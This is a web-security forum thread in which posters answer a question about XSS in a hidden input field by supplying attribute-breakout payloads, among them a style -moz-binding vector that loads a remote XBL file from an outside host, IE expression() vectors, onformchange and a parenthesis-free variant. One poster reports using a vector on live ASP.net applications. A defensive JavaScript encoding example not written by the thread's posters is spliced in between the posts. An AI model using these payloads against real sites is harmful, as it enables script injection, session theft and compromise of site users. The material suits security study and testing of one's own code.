Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
XSS in hidden field?
Posted by: xj
Date: November 06, 2007 12:44PM

Hi,

is it possible to have an exploit here?

<input type="hidden" value="INPUT" name="test">

INPUT is user input
< and > are encoded

events such as onmouseover has no effect on hidden field

regards

Re: XSS in hidden field?
Posted by: kirke
Date: November 06, 2007 02:50PM

hxxp://...your-url-here-....?test="><b>bingo

Re: XSS in hidden field?
Posted by: Spyware
Date: November 06, 2007 02:56PM

"><script>alert(1)</script> as INPUT
=]

It's that easy.

EDIT: Oops, didn't read carefully. Let me see what I can come up with...



Edited 1 time(s). Last edit at 11/06/2007 03:04PM by Spyware.

Re: XSS in hidden field?
Posted by: xj
Date: November 06, 2007 02:59PM

< and > are encoded..

Re: XSS in hidden field?
Posted by: kuza55
Date: November 07, 2007 02:33AM

In IE your best bet is to use this vector: http://ha.ckers.org/xss.html#XSS_DIV_expression

And for Firefox you should use this one: http://ha.ckers.org/xss.html#XSS_Remote_style_sheet_part_4 (just embed the -moz-binding attribute in the style attribute as in the IE one)

If you're trying to attack Opera though, I think you're out of luck.

----------------------------------------------------------
Don't forget our IRC: irc://irc.irchighway.net/#slackers
[kuza55.blogspot.com]

Re: XSS in hidden field?
Date: November 13, 2007 07:49AM

<input type="hidden" value="INPUT" name="test">

take for INPUT this:

whatever" type="image" src="dontcare.jpg" onerror="alert(123)

Re: XSS in hidden field?
Posted by: Anonymous User
Date: November 13, 2007 08:40AM

That won't work - type attributes can't be overwritten anymore.

Re: XSS in hidden field?
Date: November 13, 2007 09:30AM

oh ok my fault ;-)

Re: XSS in hidden field?
Posted by: Gareth Heyes
Date: November 13, 2007 10:03AM

Styles are the way to go man! :)

" style="-moz-binding:url('http://www.businessinfo.co.uk/labs/xbl/xbl.xml%23xss')

Firefox only but you could use, background-image for IE 6 or @import rules and maybe even background="javascript:alert(/XSS/)" for Opera

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 11/13/2007 10:10AM by Gareth Heyes.

Re: XSS in hidden field?
Posted by: Gareth Heyes
Date: November 13, 2007 10:17AM

Save as testxss.php:-
<?php
echo '<input type="hidden" name="x" value="'.$_GET['x'].'">';
?>

Replace the x with t obviously to test it:-

hxtp://localhost/testxss.php?x=" style="-moz-binding:url('http://www.businessinfo.co.uk/labs/xbl/xbl.xml%23xss')

%23 is the # symbol urlencoded, it won't work without this.

You'll need PHP and a local server to test or other server side language. I tested on FF 2.0.0.9

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 11/13/2007 10:28AM by Gareth Heyes.

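The thread's point is that encoding only < and > leaves a double-quoted attribute open to the " style=... breakout that xj and Gareth discuss. The following is an added example (not code from the thread or from Gareth's testxss.php): it renders the same hidden field with the angle-bracket-only filter and with full attribute-context encoding, and counts how many attributes a browser would end up parsing. Function names and the sample input are constructed for illustration.

```javascript
// Added example: the two filters under discussion, applied to the hidden
// field from the original question. Function names are hypothetical.

// The filter xj describes: only < and > are encoded, the double quote is not.
function encodeAnglesOnly(value) {
  return value.replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Attribute-context encoding: also & and both quote characters.
// The PHP equivalent for testxss.php is htmlspecialchars($x, ENT_QUOTES, 'UTF-8').
function encodeAttribute(value) {
  return value
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Same template as testxss.php: the input lands in a double-quoted value attribute.
function renderHidden(userInput, encoder) {
  return '<input type="hidden" name="x" value="' + encoder(userInput) + '">';
}

// Lists the double-quoted attributes present on the rendered tag.
// A safe rendering always yields exactly the three the template defines.
function attributeNames(tag) {
  const names = [];
  const re = /([a-zA-Z-]+)\s*=\s*"[^"]*"/g;
  let m;
  while ((m = re.exec(tag)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Constructed sample input with the same shape as the style breakout in the thread.
const SAMPLE = '" style="display:block" onmouseover="alert(1)';

console.log(attributeNames(renderHidden(SAMPLE, encodeAnglesOnly)));
// angle-only filter: ['type','name','value','style','onmouseover']
console.log(attributeNames(renderHidden(SAMPLE, encodeAttribute)));
// attribute encoding: ['type','name','value']
```

Encoding must match the context the value is written into; the angle-bracket filter is sufficient only for text between tags, not inside an attribute.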
Re: XSS in hidden field?
Posted by: xj
Date: November 14, 2007 12:44PM

thanks! using style does work.

Re: XSS in hidden field?
Posted by: hackathology
Date: November 18, 2007 09:41AM

has anyone tried the DIV one with <DIV STYLE="width: expression(alert('XSS'));"> in IE?

http://hackathology.blogspot.com



Edited 1 time(s). Last edit at 11/18/2007 09:42AM by hackathology.

Re: XSS in hidden field?
Posted by: timb
Date: November 18, 2007 12:06PM

Using '" style="bahaviour:expression(function{}{ alert('xxs') }(this)}' works a treat up to and including IE7. We've been using it all weak on ASP.net applications with the XSS checks enabled.

Re: XSS in hidden field?
Posted by: Mephisto
Date: November 18, 2007 08:22PM

timb,
I don't see how that is possible? The .NET framework prevents "expression" tags. The only known workaround (which has been fixed) was to use "expr/**/ession" or some other variant that included the /**/ comment characters.

Would you mind explaining the context in which you are injecting this vector?



Edited 1 time(s). Last edit at 11/18/2007 08:22PM by Mephisto.

Re: XSS in hidden field?
Posted by: Martin
Date: November 22, 2007 03:24PM

Mephisto: They might have disabled RequestValidation - he did say weak applications!

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Re: XSS in hidden field?
Posted by: john-doe
Date: December 03, 2007 03:34PM

I like the moz-binding "feature" but what if " is also encoded? I wonder myself if there's another way?

Re: XSS in hidden field?
Posted by: krayknot
Date: August 28, 2009 12:29AM

Yes you can pass XSS in hidden field

follow the following instructions:
1) Head over to the web page you want to edit.

2) In the browser’s address bar, paste this code:

javascript:document.body.contentEditable='true'; document.designMode='on'; void 0

3) Now click on the part of the page you want to edit and start changing, deleting and adding text.

4) When you finished with the editing, change the property of contentEditable to 'false'. Now you are able to post with the change content.

Source: www.krayknot.om



Edited 2 time(s). Last edit at 09/25/2009 05:35AM by krayknot.

Re: XSS in hidden field?
Posted by: Gareth Heyes
Date: August 28, 2009 02:46AM

@krayknot

Why why why? Why do you bother submitting this crap content just for SEO. Get a life

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: XSS in hidden field?
Posted by: PaPPy
Date: August 28, 2009 07:00AM

or get a plugin like firebug for firefox. or save the form to your desktop.

plus this has nothing to do with xss in a hidden field

what the post is about, if ur too lazy to read is, if you find some xss that is inserted into a hidden field, you cant do onmouseover because it's hidden

this page gave some suggestions to still fire off ur XSS

http://www.xssed.com/archive/author=PaPPy/

Re: XSS in hidden field?
Posted by: ademix
Date: August 29, 2009 02:06PM

PaPPy Wrote:
-------------------------------------------------------
> what the post is about, if ur too lazy to read is,
> if you find some xss that is inserted into a
> hidden field, you cant do onmouseover because it's
> hidden

You can still do onmouseover on hidden field with some CSS :
<input type="hidden" onmouseover="javascript:alert(1)" style="display:block; width:500px; height:500px;" />
And your input becomes visible. Worked on Firefox, I didn't test it on IE or other.

http://www.ademix.net/

Re: XSS in hidden field?
Posted by: Anonymous User
Date: August 29, 2009 02:38PM

Yep - written up here http://maliciousmarkup.blogspot.com/2008/11/hidden-fields-vs-css.html - Still a FF only issue.

Re: XSS in hidden field?
Posted by: Albino
Date: January 04, 2013 02:10PM

For posterity, none of the above techniques appear to work anymore but this works in Opera:

<input type=hidden onformchange=alert(2)/>

Courtesy of http://html5sec.org/#23

-------------------------------------------------------
Research blog

Re: XSS in hidden field?
Posted by: kamal
Date: February 26, 2013 01:46PM

Hi,

I have the same scenario but apart from <,> symbols... application filters (,) symbols also... So I can't use something like alert()... Can anyone help me on this

Re: XSS in hidden field?
Posted by: Albino
Date: March 23, 2013 08:54AM

onformchange="document.innerHTML=location.hash"

See also http://www.thespanner.co.uk/2012/05/01/xss-technique-without-parentheses/

-------------------------------------------------------
Research blog
